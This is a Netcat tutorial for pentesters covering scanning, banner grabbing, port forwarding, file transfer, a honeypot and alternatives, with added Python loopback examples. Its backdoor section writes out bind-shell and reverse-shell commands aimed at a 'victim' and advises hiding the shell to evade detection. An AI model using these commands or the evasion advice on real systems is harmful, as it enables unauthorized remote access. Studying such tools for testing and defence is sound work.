Most of the tools in any hacker's or pentester's arsenal are task-specific: they specialize in one function only. Netcat, also known as the 'TCP/IP Swiss Army Knife,' does not fall into this category. Netcat simply reads and writes data across network connections using TCP or UDP, but this one capability lets it perform many different functions. Because it can create almost any kind of connection, it is a simple and efficient network debugging and exploration tool, and because it can act as a client as well as a server, its utility goes further still.
Netcat provides the following functionalities that can be useful for a hacker/pentester or a network admin:
Before describing Netcat's functionalities in detail, a few terms need to be explained briefly:
Port Scanning: The act of systematically scanning a host for open ports. Once determined, these open ports can be utilized to gain access to the host or to launch an attack.
Banner Grabbing: A fingerprinting technique aimed at extracting information about a host such as its operating system, web server, applications, etc. A simple form of banner grabbing is to send a request and analyze the response received.
Port Redirection: A simple technique used to transfer traffic from one port to another. It is utilized to access services which are restricted in any specific environment.
Honeypot: A Honeypot is a monitored decoy used to attract attackers away from critical resources and also a tool to analyze an attacker’s methods and characteristics. It can emulate various services provided by an OS and also generate responses for those services. It provides an environment which is capable of interacting with an attacker and monitors his/her activities without any real resources at risk.
First of all, let's see all the options Netcat provides:
root@bt:~# nc -h
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
Let’s now dive into the details of Netcat as a tool.
Chatting: Netcat can be used to chat from one system to another. We configure Netcat to listen on a specific port on one machine and connect to that address (IP + port) from a remote Netcat instance, as shown in figure 1.
Machine A  root@bt:~# nc -l -p 123
Machine B  C:\> nc 192.168.118.130 123
Figure 1. Chatting using Netcat
Port Scanning: Although there are many sophisticated tools for port scanning a host, such as Nmap and Scapy, Netcat can also be used for it. It does not produce very detailed output and has no advanced features such as OS fingerprinting, yet it is capable of detecting whether a port is open or not. Netcat as a port scanner is demonstrated in figure 2.
Machine B  C:\> nc -v -w 2 -z 192.168.118.130 1-100
Figure 2. Port Scanning
Banner Grabbing: Extending the same feature, we can also perform banner grabbing. Figure 3 shows how we extracted the web server header (Apache/2.2.14) by connecting to port 80 and typing an HTTP request.
Machine B  C:\> nc -vv 192.168.118.130 80
Figure 3. Banner Grabbing
Port Forwarding: Sometimes there are restrictions on the ports we can use for outgoing connections (e.g. in the office). This is where Netcat's port redirection capability comes in: it lets Netcat listen on one port and redirect that traffic to another. So on our home computer we can listen on a port that is allowed in the restricted environment and forward it to the port we actually want to reach; from that environment we then simply connect to our home machine. The setup is displayed in figure 4.
Machine A  root@bt:~# nc -l -p 8008 -c "nc google.com 80"
Machine B Browse 192.168.118.130:8008
File Transfer: Extending this further, we can also transfer files using Netcat. For this we set up Netcat on the receiving side in listen mode and redirect anything it receives into a file; on the sender's side we connect to the receiver's address and feed the file in on standard input, as demonstrated in figure 5. Netcat does not provide any method to check that the file has been transferred completely, so we need to wait for some time based on the file size and the transfer rate and then terminate the connection.
Machine A  root@bt:~# nc -lv -p 123 > test.txt
Machine B  C:\> nc 192.168.118.130 123 < test1.txt
Figure 5. File Transfer
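The article notes that Netcat gives no completion signal for a transfer. The following added example (not from the original article) reproduces both ends of figure 5 with plain Python sockets over loopback and then compares SHA-256 digests of the two files, which is the check a practitioner would want after any nc transfer; the file names and the `demo` helper are constructed for this example.

```python
import hashlib
import os
import socket
import tempfile
import threading

def sha256_of(path):
    """Digest of a file, streamed so large transfers do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def receive_file(dest, bind="127.0.0.1", port=0):
    """Receiver side of `nc -lv -p 123 > test.txt`: accept one connection, write until the peer closes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((bind, port))
    srv.listen(1)
    done = threading.Event()
    def serve():
        conn, _ = srv.accept()
        with conn, open(dest, "wb") as out:
            while chunk := conn.recv(65536):  # b"" (EOF) is the only "finished" signal nc ever gives
                out.write(chunk)
        srv.close()
        done.set()
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], done  # port actually bound (port=0 lets the OS pick a free one)

def send_file(src, host, port):
    """Sender side of `nc host 123 < test1.txt`: stream the file, then close the write side so EOF arrives."""
    with open(src, "rb") as f, socket.create_connection((host, port)) as s:
        s.sendfile(f)
        s.shutdown(socket.SHUT_WR)

def transfer_and_verify(src, dest, host="127.0.0.1"):
    """Do what the article says nc cannot: confirm the file arrived complete by comparing digests."""
    port, done = receive_file(dest, host)
    send_file(src, host, port)
    return done.wait(10) and sha256_of(src) == sha256_of(dest)

def demo(size=300_000):
    """Constructed sample: send a random file over loopback and report (hashes match?, bytes received)."""
    work = tempfile.mkdtemp()
    src, dest = os.path.join(work, "test1.txt"), os.path.join(work, "test.txt")
    with open(src, "wb") as f:
        f.write(os.urandom(size))
    ok = transfer_and_verify(src, dest)
    return ok, os.path.getsize(dest)
```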
Honeypot: Netcat can also be used to set up a very simple Honeypot. For this we run Netcat in listen mode on a specific port and feed it a user-defined reply to send to any incoming connection. It also lets us see the traffic (probably an attack) received on that port. Figure 6 shows a simple Honeypot.
Machine A  root@bt:~# nc -lvvp 443 < apache2.txt
Machine B C:\> nc 192.168.118.130 443
Figure 6. Simple Honeypot
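Added example, not from the original article: a pure-Python stand-in for the three listener/client pairs above (the `-z` scan of figure 2, the banner grab of figure 3 and the canned-reply honeypot of figure 6), run against each other on loopback. The honeypot also logs each peer and the first bytes it sent, which is what makes a decoy useful to a defender. The `Apache/2.2.14` banner is constructed to match the article; all function names are the example's own.

```python
import socket
import threading
import time

# Constructed canned reply, standing in for the apache2.txt the article feeds to nc.
FAKE_BANNER = b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.14\r\nContent-Length: 0\r\n\r\n"
LOG = []  # what a real honeypot would write to disk: (utc time, peer ip, peer port, bytes received)

def honeypot(bind="127.0.0.1", port=0):
    """Listener side of `nc -lvvp 443 < apache2.txt`, except it also records each peer and what it sent."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((bind, port))
    srv.listen(5)
    def serve():
        while True:
            try:
                conn, peer = srv.accept()
            except OSError:  # listener closed
                return
            with conn:
                conn.settimeout(2)
                try:
                    data = conn.recv(1024)  # b"" when a -z style probe has already closed
                except socket.timeout:
                    data = b""
                LOG.append((time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()), peer[0], peer[1], data))
                if data:  # only a peer that actually talked to us gets the fake banner
                    conn.sendall(FAKE_BANNER)
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]  # the port actually bound (port=0 lets the OS pick a free one)

def scan(host, ports, timeout=2.0):
    """`nc -v -w 2 -z host lo-hi`: a TCP connect scan with no payload; returns the ports that accepted."""
    open_ports = []
    for p in ports:
        try:
            socket.create_connection((host, p), timeout=timeout).close()
            open_ports.append(p)
        except OSError:
            pass
    return open_ports

def grab_banner(host, port, timeout=2.0):
    """`nc -vv host 80` with a minimal request typed in; returns the Server header value, or None."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
        reply = s.recv(4096).decode("latin-1")
    return next((line.split(":", 1)[1].strip() for line in reply.split("\r\n")
                 if line.lower().startswith("server:")), None)
```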
Backdoor: Netcat can also be utilized as a backdoor. To understand the working of Netcat as a backdoor, let’s assume the following configuration:
Figure 7. Configuration Demonstration
Machine A is behind a NAT device and accesses the web using the private IP address provided by the NAT. The NAT device and B both have a public IP address as shown in figure 7.
Now there are two scenarios for this configuration:
I Bind Shell: In this scenario the attacker (A) needs to connect to the victim's machine (B) again in the future, so after exploiting the victim's machine once, he/she has dropped a custom Netcat instance there. On the victim's machine, Netcat is run in listen mode on a specific port with its connection attached to an executable (cmd.exe) via -e. Now the attacker can simply connect to it by providing the IP address and the port number and can execute commands on the victim. Figure 8 clearly demonstrates the scenario.
Machine B  C:\> nc -lvvp 1234 -e cmd.exe
Machine A  root@bt:~# nc -v 192.168.118.1 1234
Figure 8. Bind Shell
II Reverse Shell: In this scenario the positions are switched: the victim (A) is behind a NAT device and the attacker (B) needs to connect to him/her. This time the attacker uses Netcat's ability to hand a command shell to a host that is listening for a connection. The Netcat instance on the victim's machine connects out to the attacker and passes its command shell to the attacker's listening machine, as shown in figure 9.
Machine B  C:\> nc -lvvp 1234
Machine A  root@bt:~# nc -v 192.168.118.1 1234 -e /bin/bash
Figure 9. Reverse Shell
While using Netcat as a backdoor, we need to keep in mind that if we use it as it is, it will pop up a command shell window on the victim's machine, so we need to make sure to hide it inside another process/executable or implement other techniques to make it undetectable.
So we have discussed some handy uses of Netcat, but these are not the only functionalities it provides; we can do much more by integrating it with other tools. Netcat is a very powerful tool, but it is sometimes flagged as malware by anti-virus products; hence, we should also discuss some Netcat alternatives, which provide additional functionality.
Cryptcat: Cryptcat is a Netcat clone with twofish encryption, so that the communication sent/received is encrypted. All of the other functions are the same as Netcat. Cryptcat can be downloaded from http://sourceforge.net/projects/cryptcat/files/.
SBD: Similar to Cryptcat, SBD is another Netcat clone with AES-CBC-128 + HMAC-SHA1 for the purpose of encryption.
Socat: Socat is similar to Netcat and supports many different address types. It can work with files, pipes, sockets, proxies, SSL, etc.
Ncat: Ncat is an improved reimplementation of Netcat and ships with the widely used port scanner Nmap. Apart from the usual options, it provides advanced features such as IPv6 support, Ncat chaining, SCTP support, etc. Ncat supports SSL, which lets the user transfer files securely or connect to SSL-enabled services. Ncat also supports proxies (HTTP/SOCKS) and can itself act as a proxy. We can also define a blacklist of hosts that we do not want connecting to us using the --deny option. One other interesting feature of Ncat is its 'broker' mode, which allows multiple hosts to connect to a central Ncat server and communicate with each other. With all these new features, Ncat is a perfect replacement for Netcat. File transfer over SSL using Ncat is shown in figure 10.
Machine A  root@bt:~# ncat -l --ssl 123 > Ncattest.txt
Machine B  C:\> ncat 192.168.118.130 123 --ssl < test2.txt
Figure 10. Ncat File Transfer over SSL
There are more sophisticated tools for every single feature Netcat provides, yet no other tool packs so many functionalities into a single small package. Netcat is not only useful for a pentester; system administrators can use it for their daily work as well. Its simplicity of use and implementation makes Netcat one of the most widely used tools in every pentester's arsenal.